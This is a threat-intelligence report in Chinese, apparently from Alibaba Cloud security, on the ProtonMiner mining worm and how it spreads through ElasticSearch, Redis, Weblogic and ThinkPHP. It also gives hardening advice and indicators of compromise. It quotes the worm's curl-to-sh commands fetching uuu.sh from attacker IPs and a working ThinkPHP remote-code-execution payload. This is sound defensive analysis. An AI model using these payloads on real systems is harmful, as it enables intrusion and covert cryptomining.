​​背景

近日,阿里云安全监测到一种挖矿蠕虫,正在互联网上加速传播。阿里云安全根据它使用ProtonMail邮箱地址作为矿池用户名的行为,将其命名为ProtonMiner。据分析,这种蠕虫与TrendMicro于2018年12月曾报导过的“利用ElasticSearch旧漏洞传播的蠕虫”非常相似,可能是同一团伙所为。但与先前报导不同的是,二月中旬,该挖矿蠕虫扩大了攻击面,从仅攻击ElasticSearch这一种服务,变为攻击包括Redis, Weblogic在内的多种服务,传播速度大大加快。

本文着重描写该挖矿僵尸网络的传播手法,并在文末列出了安全建议,以帮助用户避免遭受感染,或在已被感染的情况下进行清理。

感染路径

攻击者先控制被感染主机执行以下两条命令之一,从而下载并运行uuu.sh。

/bin/bash -c curl -fsSL http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh/bin/bash -c curl -fsSL http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh

而uuu.sh脚本运行后,将继续下载挖矿程序和配置文件用于挖矿,以及下载蠕虫木马用于继续攻击未感染主机。

“谨慎”的入侵脚本

入侵脚本uuu.sh,首先会通过试着写入"/etc/devtools"目录,来判断当前账户是否拥有root权限;脚本的大部分功能,只有当前账号具有root权限时才会运行。

#!/bin/shecho 1 > /etc/devtoolsif [ -f "$rtdir" ]thenecho "i am root"echo "goto 1" >> /etc/devtools# download & attackfi

该脚本具有典型挖矿事件中恶意脚本的特征:检查并杀死其他僵尸网络的进程、将自身写入系统crontab文件、修改iptables设置从而允许某些端口上的通信等。然而这一脚本的作者或许更加谨慎:

1.在脚本最后,攻击者清空了命令历史记录

2.在挖矿配置文件中,攻击者使用了多个ProtonMail邮箱地址作为连接到矿池的用户名。ProtonMail是世界最大的安全邮件服务提供商,ProtonMiner也是因此而得名。这种使用邮箱地址,而非门罗币钱包地址作为矿池用户名的做法很好地“保护”了攻击者的隐私,也为安全工作者们判断该僵尸网络的规模和收益情况增加了难度。

传播分析

ProtonMiner的横向传播程序名为"systemctI",是一个由Go语言编译的程序。它的main函数如下图所示:

该程序在运行时,会首先通过_tmp_exe_linx_ipc_Init_ip等方法对要扫描的ip和使用的弱密码进行初始化。过程中会请求并下载以下两个地址的文件。

https://pixeldra.in/api/download/I9RRye (ip地址c段列表)
https://pixeldra.in/api/download/-7A5aP (弱密码列表)

之后程序会进入main_Scan函数,该函数包含大量的扫描和漏洞利用相关子函数。

下表列出了受到该挖矿僵尸网络影响的服务和漏洞:

例如一个ThinkPHP 的payload:

POST /index.php?s=captcha HTTP/1.1%0d%0aHost: ...%0d%0aUser-Agent: Go-http-client/1.1%0d%0aContent-Length:132%0d%0aConnection: close%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0aAccept-Encoding:gzip%0d%0a%0d%0a_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=url -fsSLhttp://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh

ProtonMiner僵尸网络扩大攻击面之后,传播速度有了显著的提升。从下图可以看出,进入2月份以来,攻击量快速上升,并在2月中旬达到高峰,阿里云观察到已有上千台主机受到感染:

安全建议

  1. 不要用root账户启动数据库、网站服务器等服务,因为root启动的服务一旦被成功入侵,攻击者将拥有被入侵主机的所有权限。此外,像Redis和Hadoop这些主要是内部使用的服务,不应暴露在公网上。
  2. 挖矿僵尸网络更新速度非常快,它们部分导致了互联网上无处不在的威胁。您可以使用云防火墙服务,检测、拦截、并保护客户避免感染。
  3. 如果你关注自身业务的网络安全却又雇不起一名安全工程师,那么你可以试试阿里云的安全管家产品,让阿里云的安全专家来给你恰当的帮助,例如协助你清除已存在的病毒、木马等。

IOC

C&C服务器:

45.76.122.92

207.148.70.143

恶意文件:

矿池地址:

xmr.pool.minergate.com:45700

使用的账号(邮箱)名:

xjkhjjkasd@protonmail.com

dashcoin230cdd@protonmail.com

alksjewio@protonmail.com

23odi093dd@protonmail.com

olpeplckdd3@protonmail.com

参考
https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-spreads-via-old-vulnerabilities-on-elasticsearch/​​​​

本文作者:悟泛

原文链接:https://yq.aliyun.com/articles/691361?utm_content=g_1000044237

威胁快报|ProtonMiner挖矿蠕虫扩大攻击面,加速传播相关推荐

  1. 威胁快报|新兴挖矿团伙借助shodan作恶,非web应用安全再鸣警钟

    近日,阿里云安全发现了一个使用未授权访问漏洞部署恶意Docker镜像进行挖矿的僵尸网络团伙.我们给这一团伙取名为Xulu,因为该团伙使用这个字符串作为挖矿时的用户名. Xulu并不是第一个攻击Dock ...

  2. 威胁快报|首爆新型ibus蠕虫,利用热门漏洞疯狂挖矿牟利...

    一.背景 近日阿里云安全团队发现了一起利用多个流行漏洞传播的蠕虫事件.黑客首先利用ThinkPHP远程命令执行等多个热门漏洞控制大量主机,并将其中一台"肉鸡"作为蠕虫脚本的下载源. ...

  3. 【一周时讯技评】安卓平台挖矿蠕虫ADB.Miner勃然而兴,中韩两国成为重灾区|Apple应用下载网站被发现传播挖矿代码

    一周时讯 本期安全时讯包括:安卓平台挖矿蠕虫ADB.Miner勃然而兴,中韩两国成为重灾区:Apple应用下载网站被发现传播挖矿代码:安全厂商揭示IoT僵尸网络JenX攻击活动:安全厂商揭示安卓色情诱 ...

  4. Docker Hub上镜像发现挖矿蠕虫病毒,已导致2000台主机感染

    点击上方"民工哥技术之路"选择"星标" 每天10点为你分享不一样的干货   安全公司Palo Alto Networks威胁情报小组Unit 42发现一种新型的 ...

  5. 爬虫你的主机中的软件中止了一个已建立的连接_Docker Hub上镜像发现挖矿蠕虫病毒,已导致2000台主机感染...

    点击上方"民工哥技术之路"选择"星标" 每天10点为你分享不一样的干货  读者福利!多达 2048G 各种资源免费赠送 安全公司Palo Alto Networ ...

  6. 【应急类漏洞】WatchDogsMiner挖矿蠕虫大量感染Linux服务器

    近日,深信服安全团队追踪到公有云上及外部Linux服务器存在大量被入侵,表现为/tmp临时目录存在watchdogs文件,出现了crontab任务异常.网络异常.系统文件被删除.CPU异常卡顿等情况, ...

  7. 威胁报告:mDNS 反射式 DDoS 攻击

    威胁报告:mDNS 反射式 DDoS 攻击 转自:https://www.akamai.com/cn/zh/about/our-thinking/threat-advisories/akamai-md ...

  8. 【威胁通告】攻击者利用漏洞攻击Edimax WiFi桥接器

    [威胁通告]攻击者利用漏洞攻击Edimax WiFi桥接器 绿盟威胁情报中心 [绿盟科技安全情报](javascript:void(0)

  9. 解决Watchdogs 、kthrotlds 挖矿蠕虫

    在最近开发项目部署过程中,发现项目运行缓慢,人员数过多情况下系统卡死. 查看服务器,top命令发现服务器中毒 crontab -l 命令后发现也存在定时调度,打开定时调度文件/root/.system ...

最新文章

  1. 异步加载 防止图片混乱
  2. Android权限申请的学习实践
  3. bzoj1115: [POI2009]石子游戏Kam
  4. 好多邮箱的SMTP设置
  5. array_merge用法
  6. 字符串的碎片整理。。。
  7. php地址地区选择器,区域选择 - 按大区及省市多选区域,可自定义用于其它业务 – 基于ThinkPHP和Bootstrap的极速后台开发框架...
  8. 计算机应用基础免费文档课件,计算机应用基础的课件.doc
  9. Mac连接京瓷打印机Fs-1030MFP/DP
  10. VC实现EXCEL转换为CSV格式
  11. Nginx 安装、解决办法
  12. java基础练习—逢七游戏、不死神兔、百钱百鸡、利滚利
  13. 人工智能前沿——玩转OpenAI聊天机器人ChatGPT(中文版)
  14. 茶与健康不得不说的话题
  15. 数字IC设计学习笔记_静态时序分析STA_伪路径False Paths
  16. python关掉警告信息(warning)
  17. 赚钱项目在家可以赚钱,赶紧来看看吧!
  18. python和vb基础哪个简单_python和VB哪个更容易学习入门呢?
  19. MACD指标使用的一些小技巧
  20. Win9x在Intel和AMD新处理器虚拟机抽风的原因及补丁

热门文章

  1. 向量几何在游戏编程中的使用3
  2. 企业应如何办理银行承兑汇票
  3. linux tomcat 启动 无法访问,Linux下 Tomcat 配置启动成功但是无法访问网页的问题【2019-09-25】...
  4. 全国10城区块链产业专项补贴政策汇总 |链捕手
  5. 游戏专题类,web网页模板分享,前端期末作业,静态页面,带轮播图,登录页
  6. Simple Baselines for Human Pose Estimation 阅读笔记
  7. 背景平铺两栏自适应(占满剩余高度)fastclick、IScroll双飞翼布局
  8. 火影抽卡模拟器1.0.5[极速版]
  9. HEVC中skip模式和merge模式的区别
  10. 祥腾财富广场、祥腾公寓、祥腾财富公寓(坐标上海市静安区汶水路地铁口)